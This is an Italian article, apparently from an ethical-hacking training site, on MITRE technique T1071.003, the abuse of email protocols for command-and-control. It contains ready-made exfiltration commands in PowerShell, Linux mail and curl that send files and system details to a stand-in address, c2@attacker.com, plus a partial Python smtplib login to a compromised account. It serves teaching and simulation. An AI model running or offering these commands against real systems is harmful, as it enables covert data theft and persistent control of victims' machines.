Protocolli Email: Application Layer Protocol - Mail Protocols (T1071.003)

I protocolli di posta elettronica rappresentano un canale privilegiato per stabilire comunicazioni nascoste tra sistemi compromessi e infrastrutture di comando e controllo. Questa tecnica sfrutta SMTP, POP3 e IMAP per mascherare il traffico malevolo all'interno delle comunicazioni email legittime, rendendo estremamente complessa l'identificazione delle attività ostili.

La versatilità di questo approccio emerge dalla sua applicabilità nella fase di Command and Control (TA0011), dove l'attaccante mantiene il controllo persistente sui sistemi compromessi mimando il normale traffico aziendale. I protocolli email offrono numerosi campi e header dove nascondere comandi e dati esfiltrati, oltre alla possibilità di utilizzare allegati o il corpo stesso del messaggio.

L'impatto di questa tecnica è significativo: 6 gruppi APT documentati la utilizzano attivamente, supportati da 20 famiglie di malware specializzate. La diffusione capillare dei servizi email in ogni ambiente aziendale rende questa tecnica particolarmente insidiosa, poiché il volume di traffico SMTP legittimo può facilmente oscurare comunicazioni malevole ben costruite.

La simulazione di canali C2 basati su protocolli email richiede una comprensione profonda delle meccaniche SMTP/IMAP. Un approccio basilare prevede l'uso di PowerShell per inviare dati attraverso server SMTP compromessi o account Gmail auto-registrati.

Per Windows, il comando Send-MailMessage -To "c2@attacker.com" -From "victim@company.com" -Subject "Report" -Body $(Get-Content sensitive.txt) -SmtpServer "mail.company.com" rappresenta il punto di partenza. L'evoluzione naturale consiste nell'encoding Base64 del payload e nell'uso di attachment binari per trasferire tool o risultati di comandi.

Su Linux, la combinazione di echo "$(hostname; id; uname -a)" | mail -s "Beacon" c2@attacker.com offre funzionalità equivalenti. L'implementazione più sofisticata prevede script Python che utilizzano le librerie smtplib e imaplib per creare canali bidirezionali completi.

import smtplib, imaplib, email
# Invio comando risultato
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login('compromised@gmail.com', 'app_password')

La vera potenza emerge quando si implementano meccanismi di polling IMAP per ricevere comandi. Tools come IMAPLoader dimostrano come trasformare una casella email in un C2 server completo, con comandi nascosti negli header X-Custom-Command o steganografati negli allegati immagine.

Per ambienti macOS, l'integrazione con Automator e AppleScript permette interazioni native con Mail.app, mentre curl smtp://mail.server.com --mail-from victim@company.com --mail-rcpt c2@attacker.com --upload-file data.zip offre controllo granulare sul protocollo.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.